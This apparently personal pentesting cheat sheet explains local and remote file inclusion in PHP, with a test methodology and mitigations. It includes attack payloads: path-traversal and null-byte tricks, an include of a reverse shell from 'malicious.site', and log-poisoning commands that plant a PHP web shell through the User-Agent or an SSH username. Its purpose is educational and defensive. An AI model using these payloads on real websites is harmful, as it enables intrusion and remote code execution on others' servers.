File inclusion
Files inclusion refers to websites that are importing a file based or using the user input. This involves using the user input to:
- π determine configuration files to include
- π determine language files to include
- ...
If the input is not filtered/validated, a hacker may include arbitrary content using Path traversal such as an uploaded script.
There are two categories of file inclusion
- Local File Inclusion (LFI) π : include a local file
- Remote File Inclusion (RFI) βοΈ: include a remote file
Template engines are more likely to contain LFI/RFI. They can lead to code/data exposure, which may further compromise the company.
β οΈ For RFI, always try a local URL that is likely not blocked by a firewall first (ex: http://127.0.0.1:80/index.php). Alternatively, you may try ftp:// or \\IP\share\ on Windows.
Basic Methodology
Assuming you found some vectors that might lead to a LFI, such as:
- π Headers
- π Forms
- πͺ Cookies
- ...
You might try to play around with the value to see if it works.
Assuming we have page=about.
- Test Path
./about - Test Null-Byte
./about.php%00 - Test a Path
../<folder name>/about - Test Architecture-specific payloads, such as
php://filter - Test Remote Inclusion
- ...
PHP File Inclusion
The website http://vulnerable.site/?lang=FR is doing an include using $_GET["lang"] as seen below.
include "lang/$_GET[lang].php"
We can use Path traversal or PHP Wrappers to include a malicious file, such as one we uploaded using another attack.
Local File Inclusion (LFI) π : inject a local file
// ex: we uploaded a reverse shell (a fake PNG)
// as our avatar (avatar.png), then we could use:
include "lang/../uploads/avatar.png";
include "phar://<refer to php wrappers>";
Remote File Inclusion (RFI) βοΈ: inject a remote file
// π allow_url_fopen MUST BE SET TO true
include "http://malicious.site/reverse_shell.php";
include "data://<refer to php wrappers>";
Additional notes
- The null byte
%00could be used in PHP < 5.3.4 to ignore trailing extensions such as.pngbelow:
include "xxx.png%00.php" // include xxx.png
-
The PHP string truncation could be used in PHP < 5.3.0 as strings longer than 4096 were truncated.
-
If they are using
assert()to filter characters such as.., we may be able to inject code in it. -
Double URL encoding may allow us to by-pass some filters (most likely not PHP filters) that are not fully decoding the URL. By default, PHP is decoding URLs once.
Log Poisoning
If the vulnerable function can execute code, we may not have to upload a webshell, we can inject PHP code in the logs and read the logs to execute the injected code.
Note that logs must be readable by the web application. Nginx logs are readable by anyone, but not Apache logs.
# Ex: load /var/log/apache2/access.log / ...
$ curl [...] -A "<?php system(\$_GET['cmd']); ?>"
π /proc/self/environ or /proc/self/fd/<0-50> will contains the User-Agent too, but they may not be readable either.
We can alternatively poison ssh logs (username), ftp logs, etc.
$ ssh '<?php /*code*/ ?>'@IP # Ex: /var/log/auth.log
PHP Sessions
If the session contains a value that we control, we can inject PHP code in this value, then we can read the session file.
-
/var/lib/php/sessions/sess_<session id> -
C:\Windows\Temp\sess_<session id>
File Inclusion Mitigation π‘οΈ
-
πͺ² Do not use *user-controlled input to include a file, whether the input is from the database or from a form.
-
𫧠Use whitelists (switch-case value to file, maps, etc.), and avoid directly using user-controlled input
-
πΈοΈ If allowing paths, refer to path traversal mitigations
-
π Use docker or a similar technology to isolate the application OR lock web applications to their web root directory. In PHP, we can set the
open_basedirvariable in the PHP INI file. Beware that configuration files will still be accessible. -
π« Use additional verifications such as using
realpathin path to ensure the files are within the allowed directories -
π Use additional tools such as a WAF, etc.
π» To-do π»
Stuff that I found, but never read/used yet.